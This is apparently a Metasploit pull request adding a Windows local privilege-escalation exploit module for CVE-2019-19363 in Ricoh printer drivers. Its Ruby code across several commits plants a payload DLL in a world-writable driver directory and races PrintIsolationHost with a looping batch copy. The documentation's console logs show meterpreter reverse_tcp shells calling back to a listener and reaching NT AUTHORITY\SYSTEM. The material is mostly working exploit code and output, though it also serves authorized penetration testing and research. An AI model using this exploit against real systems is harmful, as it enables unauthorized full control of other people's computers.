### PR TITLE
Add module for CVE-2019-19363

### DIFF
--- a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md
+++ b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md
@@ -1,0 +1,103 @@
+## Vulnerable Application
+
+  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
+  privileges on Windows systems.
+
+  For vulnerable drivers, a low-privileged user can
+  read/write files within the `RICOH_DRV` directory
+  and its subdirectories.
+
+  `PrintIsolationHost.exe`, a Windows process running
+  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+  during the installation of a printer. A user can
+  elevate to SYSTEM by writing a malicious DLL to
+  the vulnerable driver directory and adding a new
+  printer with a vulnerable driver.
+
+## Verification Steps
+
+  1. Install a vulnerable Ricoh driver
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM.
+
+## Options
+
+  **FileWriteAttempts**
+
+  This option is for setting the number of DLL write attempts.
+
+  **FileWriteWait**
+
+  This option is the amount of time to wait between each DLL write attempt.
+
+## Scenarios
+
+### Tested on Ricoh PCL6 Universal Driver `v4.13`
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.196
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.196:49160) at 2020-02-03 16:14:20 -0600
+
+  meterpreter > getuid
+  Server username: WIN-FS4V2V58LEJ\Shelby Pace
+  meterpreter > sysinfo
+  Computer        : WIN-FS4V2V58LEJ
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use ricoh_driver_privesc
+
+  Matching Modules
+  ================
+
+     #  Name                                        Disclosure Date  Rank    Check  Description
+     -  ----                                        ---------------  ----    -----  -----------
+     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation
+
+
+  [*] Using exploit/windows/local/ricoh_driver_privesc
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Writing DLL to C:\ProgramData\RICOH_DRV\PCL6 Driver for Universal Print\_common\dlz\headerfooter.dll
+  [*] Adding printer OgsHVa...
+  [*] Sending stage (206403 bytes) to 192.168.37.196
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.196:49161) at 2020-02-03 16:14:56 -0600
+  [*] Sending stage (206403 bytes) to 192.168.37.196
+  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.196:49162) at 2020-02-03 16:14:56 -0600
+  [*] Deleting printer OgsHVa
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : WIN-FS4V2V58LEJ
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```

--- a/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md
+++ b/documentation/modules/exploit/windows/local/ricoh_driver_privesc.md
@@ -14,6 +14,9 @@
   the vulnerable driver directory and adding a new
   printer with a vulnerable driver.
 
+  Multiple runs of this module may be required
+  given successful exploitation is time-sensitive.
+
 ## Verification Steps
 
   1. Install a vulnerable Ricoh driver
@@ -23,16 +26,6 @@
   5. Do: ```set SESSION <sess_no>```
   6. Do: ```run```
   7. You should get a shell running as SYSTEM.
-
-## Options
-
-  **FileWriteAttempts**
-
-  This option is for setting the number of DLL write attempts.
-
-  **FileWriteWait**
-
-  This option is the amount of time to wait between each DLL write attempt.
 
 ## Scenarios
 
@@ -47,14 +40,14 @@
   msf5 exploit(multi/handler) > run
 
   [*] Started reverse TCP handler on 192.168.37.1:4444
-  [*] Sending stage (206403 bytes) to 192.168.37.196
-  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.196:49160) at 2020-02-03 16:14:20 -0600
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600
 
   meterpreter > getuid
-  Server username: WIN-FS4V2V58LEJ\Shelby Pace
+  Server username: DESKTOP-A97LIDN\ricoh-test
   meterpreter > sysinfo
-  Computer        : WIN-FS4V2V58LEJ
-  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
   Architecture    : x64
   System Language : en_US
   Domain          : WORKGROUP
@@ -79,22 +72,23 @@
   payload => windows/x64/meterpreter/reverse_tcp
   msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
   lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > check
+  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
   msf5 exploit(windows/local/ricoh_driver_privesc) > run
 
   [*] Started reverse TCP handler on 192.168.37.1:4444
-  [*] Writing DLL to C:\ProgramData\RICOH_DRV\PCL6 Driver for Universal Print\_common\dlz\headerfooter.dll
-  [*] Adding printer OgsHVa...
-  [*] Sending stage (206403 bytes) to 192.168.37.196
-  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.196:49161) at 2020-02-03 16:14:56 -0600
-  [*] Sending stage (206403 bytes) to 192.168.37.196
-  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.196:49162) at 2020-02-03 16:14:56 -0600
-  [*] Deleting printer OgsHVa
+  [*] Adding printer JLFJCi...
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
+  [*] Deleting printer JLFJCi
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll
 
   meterpreter > getuid
   Server username: NT AUTHORITY\SYSTEM
   meterpreter > sysinfo
-  Computer        : WIN-FS4V2V58LEJ
-  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
   Architecture    : x64
   System Language : en_US
   Domain          : WORKGROUP

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -31,7 +32,9 @@ class MetasploitModule < Msf::Exploit::Local
         printer with a vulnerable driver.
 
         This module leverages the `prnmngr.vbs` script
-        to add and delete printers.
+        to add and delete printers. Multiple runs of this
+        module may be required given successful exploitation
+        is time-sensitive.
       ),
       'License'        => MSF_LICENSE,
       'Author'         => [
@@ -65,11 +68,6 @@ class MetasploitModule < Msf::Exploit::Local
     ))
 
     self.needs_cleanup = true
-
-    register_options([
-      OptInt.new('FileWriteAttempts', [ true, 'Number of times to attempt to write DLL', 20 ]),
-      OptFloat.new('FileWriteWait', [ true, 'Time to wait between each file write attempt', 0.05 ])
-    ])
 
     register_advanced_options([
       OptBool.new('ForceExploit', [ false, 'Override check result', false ])
@@ -109,22 +107,35 @@ class MetasploitModule < Msf::Exploit::Local
 
     dll_data = generate_payload_dll
     dll_path = "#{@driver_path}\\headerfooter.dll"
-    print_status("Writing DLL to #{dll_path}")
+
+    temp_path = expand_path('%TEMP%\\headerfooter.dll')
+    vprint_status("Writing dll to #{temp_path}")
+
+    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+    bat_file = <<~HEREDOC
+      :repeat
+      #{cp_cmd} && goto :repeat
+    HEREDOC
+
+    write_file(bat_file_path, bat_file)
+    write_file(temp_path, dll_data)
+    register_files_for_cleanup(bat_file_path, temp_path)
 
     script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
     print_status("Adding printer #{@printer_name}...")
     client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
-
-    datastore['FileWriteAttempts'].times do
-      write_file(dll_path, dll_data)
-      Rex.sleep(datastore['FileWriteWait'])
-    end
-  rescue Rex::Post::Meterpreter::RequestError
-    print_bad('DLL write conflicting with PrintIsolationHost')
+    vprint_status("Executing script...")
+    cmd_exec(bat_cmd)
+  rescue Rex::Post::Meterpreter::RequestError => e
+    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
   end
 
   def exploit
     fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+
+    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
 
     @driver_path = ''
     unless check == CheckCode::Appears || datastore['ForceExploit']

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -137,6 +137,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
 
+    if sysinfo['Architecture'] != payload.arch.first
+      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
+    end
+
     @driver_path = ''
     unless check == CheckCode::Appears || datastore['ForceExploit']
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -14,47 +14,61 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(update_info(info,
-        'Name'           => 'Ricoh Driver Privilege Escalation',
-        'Description'    => %q(
-          placeholder description
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
-                              'placeholder',  # discovery & poc
-                              'Shelby Pace'   # msf module
-                            ],
-        'References'     =>
-          [
-            [ 'CVE', '2019-19363'],
-            [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
-          ],
-        'Arch'           => [ ARCH_X86, ARCH_X64 ],
-        'Platform'       => 'win',
-        'Payload'        =>
-        {
-        },
-        'SessionTypes'   => [ 'meterpreter' ],
-        'Targets'        =>
-          [
-            [
-              'Windows',
-              {
-              }
-            ]
-          ],
-        'Notes'          =>
-        {
-          'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
-          'Reliability' =>  [ UNRELIABLE_SESSION ],
-          'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
-        },
-        'DisclosureDate' => "Jan 22 2020",
-        'DefaultTarget'  => 0
+      'Name'           => 'Ricoh Driver Privilege Escalation',
+      'Description'    => %q(
+        Various Ricoh printer drivers allow escalation of
+        privileges on Windows systems.
+
+        For vulnerable drivers, a low-privileged user can
+        read/write files within the `RICOH_DRV` directory
+        and its subdirectories.
+
+        `PrintIsolationHost.exe`, a Windows process running
+        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+        during the installation of a printer. A user can
+        elevate to SYSTEM by writing a malicious DLL to
+        the vulnerable driver directory and adding a new
+        printer with a vulnerable driver.
+
+        This module leverages the `prnmngr.vbs` script
+        to add and delete printers.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+                            'Alexander Pudwill',  # discovery & PoC
+                            'Pentagrid AG',       # PoC
+                            'Shelby Pace'         # msf module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-19363'],
+          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Platform'       => 'win',
+      'Payload'        =>
+      {
+      },
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        =>
+        [[
+            'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
+        ]],
+      'Notes'          =>
+      {
+        'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
+        'Reliability' =>  [ UNRELIABLE_SESSION ],
+        'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
+      },
+      'DisclosureDate' => "Jan 22 2020",
+      'DefaultTarget'  => 0
     ))
 
+    self.needs_cleanup = true
+
     register_options([
-      OptInt.new('FileWriteAttempts', [ true, 'Number of times to attempt to write DLL', 7 ]),
-      OptFloat.new('FileWriteWindow', [ true, 'Time to wait between each file write attempt', 0.25 ])
+      OptInt.new('FileWriteAttempts', [ true, 'Number of times to attempt to write DLL', 20 ]),
+      OptFloat.new('FileWriteWait', [ true, 'Time to wait between each file write attempt', 0.05 ])
     ])
 
     register_advanced_options([
@@ -91,21 +105,19 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def add_printer(driver_name)
-    script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
-    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(script_path)
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
 
     dll_data = generate_payload_dll
     dll_path = "#{@driver_path}\\headerfooter.dll"
     print_status("Writing DLL to #{dll_path}")
 
-    printer_name = Rex::Text.rand_text_alpha(5..9)
-    script_cmd = "cscript \"#{script_path}\" -a -p \"#{printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
-    print_status("Adding printer #{printer_name}...")
+    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    print_status("Adding printer #{@printer_name}...")
     client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
 
     datastore['FileWriteAttempts'].times do
       write_file(dll_path, dll_data)
-      Rex.sleep(datastore['FileWriteWindow'])
+      Rex.sleep(datastore['FileWriteWait'])
     end
   rescue Rex::Post::Meterpreter::RequestError
     print_bad('DLL write conflicting with PrintIsolationHost')
@@ -119,9 +131,19 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
     end
 
+    @printer_name = Rex::Text.rand_text_alpha(5..9)
+    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
     drvr_name = @driver_path.split('\\')
     drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
     drvr_name = drvr_name[drvr_name_idx]
+
     add_printer(drvr_name)
+  end
+
+  def cleanup
+    print_status("Deleting printer #{@printer_name}")
+    Rex.sleep(3)
+    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
+    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
   end
 end

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Payload'        =>
         {
         },
-        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'SessionTypes'   => [ 'meterpreter' ],
         'Targets'        =>
           [
             [
@@ -45,12 +45,17 @@ class MetasploitModule < Msf::Exploit::Local
         'Notes'          =>
         {
           'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
-          'Reliability' =>  [],
+          'Reliability' =>  [ UNRELIABLE_SESSION ],
           'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
         },
         'DisclosureDate' => "Jan 22 2020",
         'DefaultTarget'  => 0
     ))
+
+    register_options([
+      OptInt.new('FileWriteAttempts', [ true, 'Number of times to attempt to write DLL', 7 ]),
+      OptFloat.new('FileWriteWindow', [ true, 'Time to wait between each file write attempt', 0.25 ])
+    ])
 
     register_advanced_options([
       OptBool.new('ForceExploit', [ false, 'Override check result', false ])
@@ -89,21 +94,21 @@ class MetasploitModule < Msf::Exploit::Local
     script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
     fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(script_path)
 
-    # headerfooter.dll needs to be overwritten since it's the last to load
     dll_data = generate_payload_dll
-    dll_path = "#{@driver_path}\\watermark.dll"
-    print_status("Writing malicious dll to #{dll_path}")
-    write_file(dll_path, dll_data)
+    dll_path = "#{@driver_path}\\headerfooter.dll"
+    print_status("Writing DLL to #{dll_path}")
 
-    # add the printer
     printer_name = Rex::Text.rand_text_alpha(5..9)
-    write_file(dll_path, dll_data)
-    script_cmd = "cmd.exe /c start /b cscript \"#{script_path}\" -a -p \"#{printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
-    printer_res = cmd_exec(script_cmd)
-    write_file(dll_path, dll_data)
-    print_status(printer_res)
-  rescue
-    print_bad('Unable to add printer')
+    script_cmd = "cscript \"#{script_path}\" -a -p \"#{printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    print_status("Adding printer #{printer_name}...")
+    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
+
+    datastore['FileWriteAttempts'].times do
+      write_file(dll_path, dll_data)
+      Rex.sleep(datastore['FileWriteWindow'])
+    end
+  rescue Rex::Post::Meterpreter::RequestError
+    print_bad('DLL write conflicting with PrintIsolationHost')
   end
 
   def exploit

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -1,0 +1,70 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Ricoh Driver Privilege Escalation',
+        'Description'    => %q(
+          placeholder description
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+                              'placeholder',  # discovery & poc
+                              'Shelby Pace'   # msf module
+                            ],
+        'References'     =>
+          [
+            [ 'CVE', '2019-19363'],
+            [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
+          ],
+        'Payload'        => { },
+        'Targets'        =>
+          [
+            [
+              'Windows',
+              {
+              }
+            ]
+          ],
+        'DisclosureDate' => "Jan 22 2020",
+        'DefaultTarget'  => 0
+    ))
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ])
+  end
+
+  def check
+    dir_name = "C:\Windows\ProgramData\RICOH_DRV"
+
+    return CheckCode::Safe('No Ricoh driver found') unless dir(dir_name)
+
+    res = cmd_exec("icacls \"#{dir_name}\"")
+    return CheckCode::Detected("Detected Ricoh driver directory") unless res.include?('Everyone:')
+    res = res.split('Everyone:')[1]
+
+    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless res.match(/\(F\)/)
+
+    CheckCode::Appears('Ricoh driver directory has full permissions')
+  end
+
+  def exploit
+    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
+
+    unless check == CheckCode::Appears || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
+    end
+  end
+end

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -42,6 +42,12 @@ class MetasploitModule < Msf::Exploit::Local
               }
             ]
           ],
+        'Notes'          =>
+        {
+          'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
+          'Reliability' =>  [],
+          'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
+        },
         'DisclosureDate' => "Jan 22 2020",
         'DefaultTarget'  => 0
     ))
@@ -79,6 +85,27 @@ class MetasploitModule < Msf::Exploit::Local
     CheckCode::Appears('Ricoh driver directory has full permissions')
   end
 
+  def add_printer(driver_name)
+    script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(script_path)
+
+    # headerfooter.dll needs to be overwritten since it's the last to load
+    dll_data = generate_payload_dll
+    dll_path = "#{@driver_path}\\watermark.dll"
+    print_status("Writing malicious dll to #{dll_path}")
+    write_file(dll_path, dll_data)
+
+    # add the printer
+    printer_name = Rex::Text.rand_text_alpha(5..9)
+    write_file(dll_path, dll_data)
+    script_cmd = "cmd.exe /c start /b cscript \"#{script_path}\" -a -p \"#{printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    printer_res = cmd_exec(script_cmd)
+    write_file(dll_path, dll_data)
+    print_status(printer_res)
+  rescue
+    print_bad('Unable to add printer')
+  end
+
   def exploit
     fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
 
@@ -87,5 +114,9 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
     end
 
+    drvr_name = @driver_path.split('\\')
+    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
+    drvr_name = drvr_name[drvr_name_idx]
+    add_printer(drvr_name)
   end
 end

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'CVE', '2019-19363'],
             [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
           ],
-        'Payload'        => { },
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        'Platform'       => 'win',
+        'Payload'        =>
+        {
+        },
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        =>
           [
             [
@@ -47,24 +52,40 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    dir_name = "C:\Windows\ProgramData\RICOH_DRV"
+    dir_name = "C:\\ProgramData\\RICOH_DRV"
 
-    return CheckCode::Safe('No Ricoh driver found') unless dir(dir_name)
+    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
+    driver_names = dir(dir_name)
 
-    res = cmd_exec("icacls \"#{dir_name}\"")
-    return CheckCode::Detected("Detected Ricoh driver directory") unless res.include?('Everyone:')
-    res = res.split('Everyone:')[1]
+    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
 
-    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless res.match(/\(F\)/)
+    vulnerable = false
+    driver_names.each do |driver_name|
+      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
+      next unless directory?(full_path)
+      @driver_path = full_path
 
+      res = cmd_exec("icacls \"#{@driver_path}\"")
+      next unless res.include?('Everyone:')
+      next unless res.match(/\(F\)/)
+
+      vulnerable = true
+      break
+    end
+
+    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable
+
+    vprint_status("Vulnerable driver directory: #{@driver_path}")
     CheckCode::Appears('Ricoh driver directory has full permissions')
   end
 
   def exploit
     fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
 
+    @driver_path = ''
     unless check == CheckCode::Appears || datastore['ForceExploit']
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
     end
+
   end
 end


### PR DESCRIPTION
This exploits various Ricoh drivers that are vulnerable to a privilege escalation
vulnerability. For vulnerable drivers, a low-privileged user can read/write files within the `RICOH_DRV` directory and its subdirectories.

`PrintIsolationHost.exe`, a Windows process running as NT AUTHORITY\SYSTEM,
loads driver-specific DLLs during the installation of a printer. A user can elevate to
SYSTEM by writing a malicious DLL to the vulnerable driver directory and
adding a new printer with a vulnerable driver.

This module leverages the `prnmngr.vbs` script to add and delete printers.

## Verification

- [ ]  Install a vulnerable Ricoh driver
- [ ]  Start msfconsole
- [ ]  Get a session with basic privileges
- [ ]  Do: ```use exploit/windows/local/ricoh_driver_privesc```
- [ ]  Do: ```set SESSION <sess_no>```
- [ ]  Do: ```run```
- [ ]  You should get a shell running as SYSTEM. **Note:** May require multiple tries

